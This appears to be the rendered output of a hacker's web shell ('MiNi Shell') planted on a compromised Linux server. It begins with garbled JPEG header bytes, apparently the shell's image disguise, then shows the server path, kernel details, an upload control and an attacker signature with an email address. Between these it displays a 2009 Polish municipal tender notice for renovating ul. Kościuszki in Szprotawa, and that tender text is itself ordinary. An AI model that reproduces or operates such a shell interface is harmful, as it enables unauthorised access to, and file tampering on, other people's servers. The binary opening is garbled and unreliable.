JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090602/175562-N-2009.html

<p class="kh_header"><b>Szprotawa: Remont ul. Kościuszki w Szprotawie</b><br>
<b>Numer ogłoszenia: 175562 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski Szprotowa , Rynek 45, 67-300 Szprotawa, woj. lubuskie, tel. 068 3760772.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont ul. Kościuszki w Szprotawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Zakres przedmiotu zamówienia

Przedmiotem zamówienia jest wykonanie remontu nawierzchni chodników po obu stronach jezdni ul. Kościuszki  w Szprotawie oraz wykonanie remontu  nawierzchni jezdni ul. Kościuszki. Zakres zamówienia obejmuje odcinek drogi i chodników od skrzyżowania ul. Kościuszki z ulicą Młynarską, do skrzyżowania ul. Kościuszki  z ul. Ceglaną. 
Przed przystąpieniem do prac budowlanych Wykonawca sporządzi Projekt Tymczasowej Organizacji Ruchu.   
   
3. Opis robót do wykonania

Należy rozebrać istniejącą nawierzchnię chodnikową (asfalt, płyty chodnikowe, płyty granitowe, krawężniki kamienne). Po rozebraniu  nawierzchni chodnika  wykonać koryto na całej długości i szerokości chodników głębokości 30 cm, w miejscu wjazdów na posesje koryto należy pogłębić do głębokości 35 cm. Koryto należy wyprofilować z zachowaniem odpowiednich (istniejących spadków chodnika)  spadków podłużnych i poprzecznych nawiązując do wysokości  istniejącej krawędzi jezdni. W miejscu wskazanym w Projekcie Budowlanym  wykonać oraz odpowiednio zagęścić nasyp w celu uzyskania możliwości poszerzenia chodnika. 
Powierzchnię koryta należy wyrównać i zagęścić  i na tak przygotowanym podłożu wykonać rowki pod ławy betonowe na krawężniki i obrzeża betonowe. Obrzeża betonowe ( 30x8)  posadowić na ławach betonowych w miejscach projektowanych  pasów zieleni oraz od strony granicy pasa drogowego (zgodnie z dokumentacją projektową) szerokość pasa zieleni 1 m, pas zieleni przylega bezpośrednio do krawężnika, spoiny należy wypełnić zaprawą cementową. W miejscach wjazdów na posesje od strony posesji należy posadowić krawężniki najazdowe (15x22) na ławie betonowej, krawężniki najazdowe posadowić nawiązując do wysokości terenu wjazdu na posesje. Od strony zjazdów na jezdnię krawężniki betonowe (30x15) posadowić na ławach betonowych nawiązując do wysokości istniejącej jezdni uwzględniając warstwę asfaltu  (8 cm).   Obrzeża  i krawężniki posadowić na takiej wysokości aby po wykonaniu nawierzchni chodnika i asfaltowej nawierzchni jezdni, zachowane były odpowiednie spadki chodnika w  kierunku jezdni oraz aby zachowana była wysokość krawężnika liczona od poziomu wykonanej nawierzchni asfaltowej gr. (ok. 8 - 12 cm).  Na tak przygotowanym podłożu koryta rozścielić i odpowiednio zagęścić  warstwę odsączającą podbudowy  z piasku gr. 10  cm  w ciągu chodników oraz  wjazdów na posesje. Następnie rozścielić i zagęścić warstwę  podbudowy  z kruszywa łamanego grubości 12 cm w miejscach wjazdów na posesje oraz gr. 5 cm w pozostałych częściach chodnika. Na warstwę tłucznia rozścielić na całej szerokości i długości chodnika warstwę miału kamiennego gr. 3 cm.  Na odpowiednio zagęszczone warstwy podbudowy  ułożyć kostkę betonową grubości 8 cm na podsypce cementowo piaskowej grubości 5cm  na całej długości chodnika z zachowaniem odpowiednich spadków podłużnych i poprzecznych. Wjazdy na posesje (całe) oraz brzegi chodnika po obu stronach chodnika (dwa rzędy kostki z każdej strony) należy ułożyć z czerwonej kostki. Spoiny wypełnić piaskiem. Ciągi pasów zieleni wypełnić ziemią urodzajną i odpowiednio zagęścić. Istniejącą nawierzchnię chodnikową zbudowaną  z kostki betonowej należy pozostawić. Wykonać nawierzchnię asfaltową jezdni gr. 8 cm   zgodnie z Projektem  Budowlanym. Całość robót wykonać zgodnie Dokumentacją Projektową , Specyfikacją Techniczną Wykonania i Odbioru Robót oraz Specyfikacja Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 15 000 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą oferenci spełniający warunki wynikające z art. 22 ust.1 ustawy z dnia 29 stycznia 2004r  z późn. zm. Prawo zamówień publicznych, czyli:

 1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli    
  ustawy nakładają obowiązek posiadania takich uprawnień. Na potwierdzenie Wykonawca przedstawi Zamawiającemu  następujące dokumenty:

1.1 aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
1.2 aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.3 aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.4 aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;


2.Posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny a także  dysponują osobami zdolnymi do wykonania zamówienia. Na potwierdzenie Wykonawca przedkłada następujące dokumenty:

2.1  wykaz osób  z podaniem zakresu wykonywanych czynności  przy realizacji zamówienia , imion i nazwisk, kwalifikacji zawodowych, uprawnień (ich numer i zakres) oraz doświadczenia w przypadku kierownika budowy - zgodnie z załącznikiem nr 3 
Wykonawca musi dysponować kierownikiem budowy o specjalności drogowej z uprawnieniami bez ograniczeń do kierowania robotami budowlanymi, posiadającym doświadczenie w kierowaniu minimum dwoma zadaniami o podobnym charakterze i co najmniej dwuletni staż na tym stanowisku. Ww. osoba musi posiadać uprawnienia do sprawowania samodzielnych funkcji technicznych  w budownictwie, wymagane przepisami ustawy z dnia 7 lipca 1994r Prawo Budowlane (Dz. U.  z 2006r nr 156 poz 1118 z póz. Zmianami) oraz musi być zrzeszona w Polskiej Izbie Inżynierów Budownictwa.
2.2 dokumenty potwierdzające uprawnienia i aktualne zaświadczenia o przynależności do Polskiej Izby Inżynierów Budownictwa.
2.3 pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia jeżeli z załączniku  nr 3  wykonawca wskazał osoby którymi będzie dysponował
2.4 Wykaz zrealizowanych zadań o podobnym charakterze z podaniem nazwy zadania i jego zamawiającego okresu realizacji i długości drogi (dla zadań ponad 2 km na jedno zamówienie) zgodnie z załącznikiem nr 4. Na potwierdzenie posiadania niezbędnej wiedzy i doświadczenia  w realizacji zadań o charakterze i złożoności porównywalnej z zakresem przedmiotu zamówienia Wykonawca w załączniku nr 4 wykaże realizację w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres działalności jest krótszy -w tym okresie, realizację(zakończoną) zamówienia  lub zamówień polegających  na remoncie , przebudowie  lub budowie dróg z nawierzchnią bitumiczną  o łącznej  długości ponad 20km.
2.5 dokumenty potwierdzające , że zadania wyszczególnione  w załączniku nr 4 zostały wykonane z należytą starannością (referencje).
2.6 Wykaz sprzętu z podaniem rodzaju i ilości  zgodnie z załącznikiem nr 5. W załączniku nr 5 Wykonawca w celu potwierdzenia dysponowania potencjałem technicznym wykaże ,że dysponuje przynajmniej następującym sprzętem:
-frezarką do nawierzchni drogowych  z podajnikiem o długości min 2mi szerokości roboczej min 2m -1 sztuka
-koparką kołową  jednonaczyniową  o pojemności łyżki min. 0,25m3 - 1 sztuka
-skrapiarka samojezdną samochodową  do bitumu o poj. 5000 dm3 - 1 sztuka
-walcem statycznym samojezdnym ogumionym od 10 Mg do 15 Mg - 1 sztuka
-walcem wibracyjnym samojezdnym od 7,5 Mg do 15 Mg - 1 sztuka
-rozkładarka mas bitumicznych  od 3 m do 7,5 m - 1 sztuka 
2.7 pisemne zobowiązanie innych podmiotów do udostępniania niezbędnego sprzętu do wykonania zamówienia, jeżeli w załączniku nr 5 wykonawca wykazał sprzęt którym będzie dysponował.

3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie                      zamówienia. 
3.1 Na potwierdzenie niniejszego warunku Wykonawca przedłoży polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony  od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 5000 000.
3.2 Wykonawca na potwierdzenie ww. warunku przedłoży również informację z Banku lub kasy oszczędnościowo pożyczkowej potwierdzającą wysokość posiadanych środków w wysokości min 3000 000 PLN  lub zdolność kredytową wykonawcy na kwotę co najmniej 3000 000 PLN  wystawioną nie wcześniej  niż 2 miesiące  przed terminem składania ofert. 
 
4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia według paragrafu  24 ust.1 i 2 prawa zamówień publicznych. 
5 Zamawiający nie dopuszcza podwykonawstwa w zakresie wykonania  nawierzchni drogi.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Dokumenty wymagane:
- formularz ofertowy z wykorzystaniem załączonego wzoru
- informacja ogólna o oferencie - załącznik nr 1
-dowód wniesienia wadium
-oświadczenie o spełnieniu warunków określonych art. 22 ustawy z dnia 29 stycznia 2004r Prawo zamówień publicznych (Dz. U. z 2007r  Nr 223, poz.1655  z póź. Zm)   zał. Nr 2
- kosztorys ofertowy zał. nr 7
- zaakceptowany wzór umowy - załącznik nr 6
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
- aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
- aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
-aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
- wykaz osób  z podaniem zakresu wykonywanych czynności  przy realizacji zamówienia , imion i nazwisk, kwalifikacji zawodowych, uprawnień (ich numer i zakres) oraz doświadczenia w przypadku kierownika budowy - zgodnie z załącznikiem nr 3 
-dokumenty potwierdzające uprawnienia i aktualne zaświadczenia o przynależności do Polskiej Izby Inżynierów Budownictwa.
-pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia jeżeli z załączniku  nr 3  wykonawca wskazał osoby którymi będzie dysponował
-Wykaz zrealizowanych zadań o podobnym charakterze z podaniem nazwy zadania i jego zamawiającego okresu realizacji i długości drogi (dla zadań ponad 2km na jedno zamówienie) zgodnie z załącznikiem nr 4. 
-dokumenty potwierdzające , że zadania wyszczególnione  w załączniku nr 4 zostały wykonane z należytą starannością (referencje).
-wykaz sprzętu z podaniem rodzaju i ilości  zgodnie z załącznikiem nr 5. 
-pisemne zobowiązanie innych podmiotów do udostępniania niezbędnego sprzętu do wykonania zamówienia , jeżeli w załączniku nr 5 wykonawca wykazał sprzęt którym będzie dysponował.
-polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony  od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 5000 000.
-informację z Banku lub kasy oszczędnościowo pożyczkowej potwierdzającą wysokość posiadanych środków w wysokości min 3000 000 PLN  lub zdolność kredytową wykonawcy na kwotę co najmniej 3000 000 PLN  wystawioną nie wcześniej  niż 2 miesiące  przed terminem składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szprotawa.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Szprotawie 
Rynek 45
67-300 Szprotawa
pok. nr 9.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2009 godzina 12:00, miejsce: Urząd Miejski w Szprotawie 
Rynek 45
67-300 Szprotawa
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com